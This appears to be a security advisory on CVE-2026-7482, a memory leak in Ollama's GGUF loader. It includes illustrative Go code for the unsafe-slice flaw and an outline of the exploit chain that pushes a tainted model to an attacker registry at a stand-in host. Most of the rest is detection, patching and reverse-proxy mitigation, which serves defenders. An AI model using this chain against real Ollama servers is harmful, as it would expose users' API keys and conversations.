Bleeding Llama: Critical Ollama Vulnerability Exposes Memory on 300,000 Servers

CVE-2026-7482: An unauthenticated remote attacker can exfiltrate memory from Ollama servers using specially crafted GGUF models. Users are urged to update to version 0.17.1 or later.

On May 12, 2026, security firm Cyera disclosed CVE-2026-7482, a critical vulnerability in Ollama’s GGUF loader that allows unauthenticated remote attackers to read the entire process memory of a target server. With a CVSS score of 9.1 and an estimated 300,000 servers potentially exposed, the flaw subverts the core promise of self-hosted AI. Local infrastructure, often chosen for privacy and compliance, has been transformed into a remote attack surface capable of leaking API keys, environment variables, and private user conversations.

Key Takeaways
  • A heap out-of-bounds read exists in Ollama's GGUF quantization path, stemming from the use of Go’s unsafe package within fs/ggml/gguf.go and server/quantization.go (WriteTo).
  • The unauthenticated remote attack involves uploading a GGUF file with manipulated tensors via /api/create, triggering an out-of-bounds read during the quantization process.
  • Leaked memory can contain environment variables, API keys, system prompts, and concurrent user chat data, which can then be exfiltrated via /api/push to an attacker-controlled registry.
  • Over 300,000 Ollama servers are estimated to be exposed globally; all versions prior to 0.17.1 are vulnerable.

Technical Breakdown: From Crafted GGUF Models to Heap Leaks

The core of the vulnerability lies in the parser for GGUF, the standard binary format for Llama-compatible models. Ollama uses Go's unsafe package for quantization operations along the path from fs/ggml/gguf.go to server/quantization.go, specifically within the WriteTo() function. Because unsafe sidesteps the runtime's standard memory safety checks, the application can read and write memory directly, without the bounds enforcement Go normally provides.
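
The minimal sketch below, which is illustrative rather than Ollama's actual code, shows the risky pattern: building a typed tensor view over a raw byte buffer with unsafe.Slice, sized by a length taken from file metadata instead of from the buffer itself. The tensorView helper and its parameters are hypothetical names for this illustration.

```go
package main

import (
	"fmt"
	"unsafe"
)

// tensorView reinterprets a byte buffer as float32 tensor data.
// Nothing checks that declaredElems*4 <= len(buf): the slice header
// is built purely from metadata an attacker controls.
func tensorView(buf []byte, declaredElems int) []float32 {
	return unsafe.Slice((*float32)(unsafe.Pointer(&buf[0])), declaredElems)
}

func main() {
	buf := make([]byte, 16) // room for exactly 4 float32 values
	view := tensorView(buf, 4)
	fmt.Println("in-bounds view has", len(view), "elements")

	// With declaredElems = 1024, the same call would return a slice
	// whose reads walk past the 16-byte allocation into adjacent heap.
}
```

Ordinary Go slicing panics on an out-of-range index; a view constructed through unsafe carries no such guardrail, so reads silently continue into neighboring allocations.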

When a user—or an attacker—uploads a model file through the /api/create endpoint, the parser reads tensor metadata without validating the declared dimensions against the actual length of the allocated buffer. A GGUF file crafted with inflated offsets or dimensions forces the quantization cycle to read beyond the heap buffer boundaries. This results in an out-of-bounds read that exposes arbitrary blocks of Ollama's process memory, which may contain sensitive data handled in previous sessions.
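
To make "inflated dimensions" concrete, here is a hedged toy illustration, using an invented layout rather than the real GGUF binary specification, of a file whose header claims far more tensor data than its payload actually contains:

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

func main() {
	// Toy "model file": an 8-byte header declaring the element count,
	// followed by the tensor payload.
	var f bytes.Buffer
	binary.Write(&f, binary.LittleEndian, uint64(1<<20)) // claims 1,048,576 elements
	f.Write(make([]byte, 256))                           // but ships only 256 bytes

	declared := binary.LittleEndian.Uint64(f.Bytes()[:8])
	fmt.Printf("declared %d elements (%d bytes) vs %d payload bytes present\n",
		declared, declared*4, f.Len()-8)
	// A loader that sizes its reads from `declared` rather than from the
	// actual payload length walks megabytes past the end of the buffer.
}
```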

The Exfiltration Chain: Leveraging /api/create and /api/push

The risk extends beyond a simple leak: an attacker can package the stolen memory into an exfiltratable artifact. After triggering the out-of-bounds read, the leaked data is incorporated into the newly quantized model, which the attacker can then upload to a registry they control via the /api/push endpoint. Data that never visibly leaves the compromised server thus becomes readable to whoever controls the push destination.
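
The outline below sketches the chain as two unauthenticated POSTs against a reachable host. The endpoints are Ollama's real API routes, but the JSON bodies, the target hostname, and the registry name are simplified placeholders; the real requests carry the crafted GGUF and full model metadata.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
)

const target = "http://victim:11434" // hypothetical exposed Ollama server

func post(path, body string) {
	resp, err := http.Post(target+path, "application/json",
		bytes.NewBufferString(body))
	if err != nil {
		fmt.Println(path, "error:", err)
		return
	}
	defer resp.Body.Close()
	fmt.Println(path, "->", resp.Status)
}

func main() {
	// Step 1: /api/create ingests the crafted GGUF; quantization performs
	// the out-of-bounds read and bakes leaked heap bytes into the output.
	post("/api/create", `{"model":"exfil","quantize":"q4_K_M"}`)

	// Step 2: /api/push ships the tainted model to a registry the
	// attacker controls, completing the exfiltration.
	post("/api/push", `{"model":"attacker-registry.example/exfil"}`)
}
```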

According to Cyera’s analysis, recoverable data includes environment variables, API keys, proprietary code fragments, system prompts, and even the conversations of concurrent users. The entire chain is remote and requires no authentication, exploiting the common OLLAMA_HOST=0.0.0.0 configuration that frequently exposes the REST interface to public networks.

The Self-Hosted AI Paradox

This disclosure challenges a widespread assumption among organizations migrating LLM workloads on-premises: that self-hosting inherently guarantees greater security and data control. With over 170,000 GitHub stars, Ollama has become the industry standard for running local models without relying on cloud APIs. However, this massive adoption has expanded the attack surface, with an estimated 300,000 servers exposed globally—often without default authentication on REST endpoints.

The lack of a native authentication mechanism for /api/create and /api/push means anyone who can reach the service port can interact with the inference engine. For organizations integrating Ollama with development tools like Claude Code, the impact extends to every tool output passing through the server; these outputs accumulate in the heap and enlarge the potential leak.

"An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more" — Dor Attias, Cyera Researcher

Risk Assessment and Global Exposure

While there is currently no confirmation of active exploitation in the wild, the combination of an unauthenticated remote exploit and a large population of exposed servers makes the risk immediate. Organizations that have deployed Ollama on cloud instances or edge servers with bindings to 0.0.0.0 are effectively providing direct, unrestricted access to the model parsing engine.
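
As a first triage step, defenders can check whether an instance answers unauthenticated requests from a given vantage point. The sketch below probes /api/tags, a standard read-only Ollama route; the hostname and timeout are placeholders to adapt.

```go
package main

import (
	"fmt"
	"net/http"
	"time"
)

func main() {
	client := &http.Client{Timeout: 5 * time.Second}
	resp, err := client.Get("http://ollama.internal:11434/api/tags")
	if err != nil {
		fmt.Println("not reachable from here:", err)
		return
	}
	defer resp.Body.Close()
	if resp.StatusCode == http.StatusOK {
		// A 200 with no credential means /api/create and /api/push are
		// almost certainly reachable without authentication as well.
		fmt.Println("WARNING: instance answers unauthenticated requests")
	} else {
		fmt.Println("status:", resp.Status)
	}
}
```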

The figure of 300,000 servers is an estimate based on the project’s global adoption and observed configurations, rather than an audit of confirmed breaches. However, this does not diminish the severity of the threat; the number serves as a critical indicator of exposure. All versions of Ollama prior to 0.17.1 are confirmed to be affected.

Mitigation and Defensive Measures

  • Immediately update Ollama to version 0.17.1 or later to apply the necessary security patches.
  • Remove or restrict the OLLAMA_HOST=0.0.0.0 variable. Limit access to the local network or segments protected by a VPN or firewall to prevent direct internet exposure.
  • Implement authentication and authorization for REST endpoints, specifically /api/create and /api/push. Since Ollama lacks native authentication by default, use a reverse proxy with mTLS, API keys, or similar mechanisms; a minimal sketch follows this list.
  • Monitor logs for anomalous requests to /api/create involving GGUF files from untrusted sources and audit for unauthorized pushes to external registries.
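
Below is a minimal sketch of the reverse-proxy approach, assuming Ollama has been re-bound to loopback: a small Go front end that refuses the high-risk routes outright and requires a shared key, read here from a hypothetical PROXY_API_KEY variable, for everything else. Production deployments would more likely use an existing gateway with mTLS.

```go
package main

import (
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
	"strings"
)

func main() {
	upstream, _ := url.Parse("http://127.0.0.1:11434") // Ollama on loopback only
	proxy := httputil.NewSingleHostReverseProxy(upstream)
	apiKey := os.Getenv("PROXY_API_KEY")

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		// Refuse model creation and registry pushes entirely: this closes
		// both the exploit's entry point and its exfiltration channel.
		if strings.HasPrefix(r.URL.Path, "/api/create") ||
			strings.HasPrefix(r.URL.Path, "/api/push") {
			http.Error(w, "endpoint disabled", http.StatusForbidden)
			return
		}
		// Everything else requires the shared key (an empty key rejects all).
		if apiKey == "" || r.Header.Get("X-Api-Key") != apiKey {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})
	http.ListenAndServe(":8443", nil) // TLS termination omitted for brevity
}
```

Blocking /api/create and /api/push at the proxy, rather than merely authenticating them, removes remote model creation as a feature but eliminates this attack chain even if a credential leaks.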

The Evolution of Model Formats as Attack Vectors

The lesson of "Bleeding Llama" transcends this specific bug. In an ecosystem where model files are binary assets executed by an inference server, the line between data and code continues to blur. The GGUF parser is not merely a metadata reader; it is an engine performing high-privilege mathematical transformations on tensors. When that engine utilizes unsafe primitives and bypasses boundary checks, the file format itself becomes a payload.

For enterprises that invested in Ollama to keep data in-house, CVE-2026-7482 serves as a strategic warning: self-hosting is an architectural choice, not a security guarantee. Without rigorous network hardening, authentication, and input validation, a local server remains a goldmine of secrets accessible to anyone capable of building the right model.

Frequently Asked Questions

Why did Go's unsafe package enable this leak?

Ollama uses the unsafe package in its quantization path to gain direct access to GGUF file tensors, bypassing the Go runtime's memory safety protections. Because the parser fails to validate tensor dimensions against the real buffer length, the WriteTo() function reads past heap buffer limits, exposing arbitrary process memory.
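
A hedged sketch of the class of fix follows, with illustrative names rather than the actual 0.17.1 patch: validate the declared element count against the real buffer before any unsafe view is constructed.

```go
package main

import (
	"fmt"
	"unsafe"
)

// safeTensorView builds the same unsafe view as the vulnerable pattern,
// but only after checking the declared count against the buffer it has.
func safeTensorView(buf []byte, declaredElems int) ([]float32, error) {
	const elemSize = int(unsafe.Sizeof(float32(0)))
	if declaredElems < 0 || declaredElems > len(buf)/elemSize {
		return nil, fmt.Errorf("declared %d elements, buffer holds %d",
			declaredElems, len(buf)/elemSize)
	}
	return unsafe.Slice((*float32)(unsafe.Pointer(&buf[0])), declaredElems), nil
}

func main() {
	buf := make([]byte, 16)
	if _, err := safeTensorView(buf, 4096); err != nil {
		fmt.Println("rejected:", err) // the check the vulnerable path lacked
	}
}
```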

Is updating to Ollama 0.17.1 enough to resolve the issue?

Version 0.17.1 contains the specific patch for CVE-2026-7482. However, it is not yet confirmed whether variants or bypasses exist. Security experts recommend combining the update with additional layers of defense, such as network segmentation and endpoint authentication.

Does exfiltration require the /api/push endpoint?

The exploit chain documented by Cyera and The Hacker News utilizes /api/push to send leaked data to an attacker-controlled registry. While it is unclear if this endpoint is enabled by default in every environment, restricting its use and monitoring its calls is a high-priority countermeasure.
